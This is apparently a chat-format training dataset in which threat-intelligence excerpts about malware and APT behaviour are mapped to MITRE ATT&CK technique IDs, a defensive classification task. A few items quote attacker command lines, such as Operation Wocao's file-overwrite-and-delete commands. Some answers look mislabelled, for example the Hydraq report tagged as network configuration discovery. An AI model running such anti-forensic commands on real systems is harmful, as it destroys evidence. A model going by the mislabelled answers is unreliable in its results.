- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks . Get Free Account . Join Now . Introduction . TeamTNT is a cybercrime group that targets cloud environments including Docker and Kubernetes instances. TeamTNT has also been spotted using a malicious Docker image which can be found on Docker Hub to infect its victims’ servers. The uniqueness of the recent attack observed by Intezer is the group abuses a legitimate open source tool called Weave Scope to gain full control over the victim’s cloud infrastructure. By installing a legitimate tool such as Weave Scope the attackers reap all the benefits as if they had installed a backdoor on the server, with significantly less effort and without needing to use malware. To install Weave Scope on the server the attackers use an exposed Docker API port and create a new privileged container with a clean Ubuntu image. Once installed, the attackers can connect to the Weave Scope dashboard via HTTP on port 4040 and gain full visibility and control over the victim’s infrastructure. To protect yourself from this attack we recommend to: - Close exposed Docker API ports: This attack takes advantage of a common misconfiguration of the Docker API which gives the attacker full control over the Docker service. Therefore, Docker API ports should be closed or contain restricted access policies in the firewall. Block incoming connections to port 4040: Weave Scope uses default port 4040 to make the dashboard accessible and anyone with access to the network can view the dashboard. Update from Weave Works . Weave Works has since provided this in-depth article on how to prevent malicious attacks using Weave Scope"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Snippets of HOLMIUM PowerShell backdoor (POWERTON) implementing two different persistence mechanisms: WMI event subscription (T1084) and Registry run keys or Startup folder (T1060"
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT1 has used various open-source tools for privilege escalation purposes."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideTwist can collect the username on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "text= from= ai= ags= oe= aq= btnG= oprnd= ai= utm= channel= The page address in the domain of the command and control server is chosen randomly from the list"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY contains a number of modules that can bypass UAC, including through Window's Device Manager, Manage Optional Features, and an image hijack on the `.msc` file extension."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some additional log file analysis reveals that a dotm file hosted with a. jpg extension was accessed by an Israeli IP address. This IP address likely belongs to a victim in Israel that executed the main DOCX. Based on the analysis of the user-agent string belonging to the Israel IP address Microsoft+Office+Existence+Discovery indicates that the dotm file in question was downloaded from within Microsoft Office (template injection"
- },
- {
- "role": "assistant",
- "content": "T1480 - Execution Guardrails"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Imminent Monitor has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CARROTBAT has the ability to download a base64 encoded payload and execute obfuscated commands on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals can register a device to Azure AD."
- },
- {
- "role": "assistant",
- "content": "T1098.005 - Device Registration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts"
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BONDUPDATER can read batch commands in a file sent from its C2 server and execute them with cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used direct Windows system calls by leveraging Dumpert."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command & Control The malware communicates with the Naver email platform in order to communicate with the operator"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has used tmp files to stage gathered information."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 continued distributing Dridex through early June 2017 using a range of email attachments. Most recently these included PDF attachments with embedded Microsoft Word documents bearing malicious macros that call PowerShell commands that install Dridex"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used the RAT, which communicates over HTTP with a payload encrypted with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can delete files and optionally overwrite with random data beforehand."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to search for a given filename on a victim."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After encrypting C2 data, BADNEWS converts it into a hexadecimal representation and then encodes it into base64."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyZBot contains keylogger functionality."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, the threat actors consistently removed traces of their activity by first overwriting a file using `/c cd /d c:\\windows\\temp\\ & copy \\\\\\c$\\windows\\system32\\devmgr.dll \\\\\\c$\\windows\\temp\\LMAKSW.ps1 /y` and then deleting the overwritten file using `/c cd /d c:\\windows\\temp\\ & del \\\\\\c$\\windows\\temp\\LMAKSW.ps1`."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access. While GDPR requirements prevented us from pivoting on Registrant information, the actors reused IP space, reused a certificate, and the aforementioned domain mimicking technique allowed for some pivoting. Toolset . Once gaining a foothold on a user’s system, the threat actors behind STOLEN PENCIL use Microsoft’s Remote Desktop Protocol (RDP) for remote point-and-click access. This means a human is behind the keyboard interacting with a compromised system, and not using a RAT (Remote Access Trojan) with a command-and-control site acting as a proxy between the threat actor and the compromised system. A compromised or stolen certificate was used to sign several PE files used in STOLEN PENCIL for two sets of tools: - MECHANICAL Logs keystrokes to %userprofile%\\appdata\\roaming\\apach. GREASE a tool to add a Windows administrator account with a specific username/password and enable RDP, circumventing any firewall rules. defaultes/1qaz2wsx#EDC - a tool to add a Windows administrator account with a specific username/password and enable RDP, circumventing any firewall rules. Figure 5: Certificate used to sign MECHANICAL/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Using a combination of stolen passwords, backdoor accounts, and a forced-open RDP service, the threat actors are likely to retain a foothold on a compromised system. Conclusion . While we were able to gain insight into the threat actor’s TTPs (Tools, Techniques, & Procedures) behind STOLEN PENCIL, this is clearly just a small window into their activity"
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NavRAT copies itself into a running Internet Explorer process to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has sent spearphishing attachments attempting to get a user to open them."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several malware families are capable of downloading and executing binaries from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates scheduled tasks to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRatReporter sent collected system and network information compiled into a report to an adversary-controlled C2."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used brute force techniques to obtain credentials."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpeakUp uses the \"ifconfig -a\" command."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly deleted system, security, terminal services, remote services, and audit logs from a victim."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET downloads browser specific AppleScript modules using a constructed URL with the \"curl\" command, \"https://\" & domain & \"/agent/scripts/\" & moduleName & \".applescript\"."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent has sent data related to a compromise host over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peirates can use stolen service account tokens to perform its operations. It also enables adversaries to switch between valid service accounts."
- },
- {
- "role": "assistant",
- "content": "T1550.001 - Application Access Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clop has used built-in API functions such as WNetOpenEnumW(), WNetEnumResourceW(), WNetCloseEnum(), GetProcAddress(), and VirtualAlloc()."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has deployed malware that has copied itself to the startup directory for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When it first starts, crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER may collect network configuration data by running \"ipconfig /all\" on a victim."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A key trait of NOBELIUM’s ongoing activity over the last year has been the abuse of indirect paths and trust relationships to target and gain access to victims of interest for intelligence gain. In the most recent campaign, this has manifested in a compromise-one-to-compromise-many approach—exploiting the service providers’ trust chain to gain broad access to multiple customer tenants for subsequent attacks. NOBELIUM leverages established standard business practices, to target downstream customers across multiple managed tenants. These delegated administrative privileges are often neither audited for approved use nor disabled by a service provider or downstream customer once use has ended, leaving them active until removed by the administrators. If NOBELIUM has compromised the accounts tied to delegated administrative privileges through other credential-stealing attacks, that access grants actors like NOBELIUM persistence for ongoing campaigns"
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script itself works as a downloader for additional files needed for loading the malware into the system, which are hosted separately as a ZIP package. We confirmed two different techniques used for distributing the Melcoz backdoor: the AutoIt loader script and DLL Hijack"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TAINTEDSCRIBE has used \"FileReadZipSend\" to compress a file and send to C2."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors used Cain & Abel to crack password hashes."
- },
- {
- "role": "assistant",
- "content": "T1110.002 - Brute Force: Password Cracking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. The backchannel URL addresses have been changed by the Dynamic DNS sites to resolve to a loopback address (127.0.0.2). This in effect severs the connection to the control servers. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the “attack surface” by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN5 has cleared event logs from victims."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MESSAGETAP checks for the existence of two configuration files (keyword_parm.txt and parm.txt) and attempts to read the files every 30 seconds."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OutSteel can automatically scan for and collect files with specific extensions."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to identify running processes and associated plugins on an infected host."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant has the ability to list the names of all open windows on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIVEHANDS has the ability to enumerate files on a compromised host in order to encrypt files with specific extensions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrifeWater can collect the user name from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains the getFirefoxPassword function to attempt to locate Firefox passwords."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GuLoader can download further malware for execution on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather the victim user name."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ScreenUtil module, which was first reported in 2017, takes a screenshot of the current user's desktop. All variants analyzed by CTU researchers were hard-coded to drop the captured image files to %APPDATA%\\Update\\Tmp"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CreepySnail can use Base64 to encode its C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script will send the specified number of DNS queries using the following format, each of which the C2 will respond with an IPv6 address that the script will treat as a string of data: www... The payload will treat the data provided by the C2 as a message, which will have the following structure: hello The message will start with the string hello followed by a 35-character UUID string"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As described in other blog posts, Remcos appears to be developed in C++. As the release notes show, it is actively maintained. 17, 2017 Remcos has the functionalities that are typical of a RAT. It is capable of hiding in the system and using malware techniques that make it difficult for the typical user to detect the existence of Remcos. A good example is the anti-analysis section: It is checking for an outdated artifact, the 'SbieDll.dll'. In our opinion, there are not many analysts using Sandboxie these days anymore. Below you can see the Remcos VMware detection code: The following is a code sample from aldeid.com: The blog referenced above has already described several functions of Remcos features in detail. We would like to focus on Remcos' cryptographic implementation. It uses RC4 pretty much everywhere when there is a need to decode or encode any data. Examples are registry entries, C2 server network communication or file paths shown below: The exepath registry data is base64-encoded, RC4-encrypted data. This can be converted into the typical RC4 pseudo code"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Most samples maintain persistence by setting the Registry Run key SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ in the HKLM or HKCU hive, with the Registry value and file name varying by sample."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts', 'T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MechaFlounder begins by entering a loop that will continuously attempt to communicate with its C2 server. The Trojan will use HTTP to send an outbound beacon to its C2 server that contains the user's account name and hostname in the URL. The code, seen in Figure 2, builds the URL by concatenating the username and hostname with two dashes \"--\" between the two strings. The code then creates the URL string by using the username and hostname string twice with the back-slash \"\\\" character between the two and by appending the string \"-sample.html"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT-C-36 has used ConfuserEx to obfuscate its variant of Imminent Monitor, compressed payload and RAT packages, and password protected encrypted email attachments to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used mshta.exe to execute VBScript to execute malicious code on victim systems."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QAKBOT abuses Wscript to execute a Jscript file."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript', 'T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
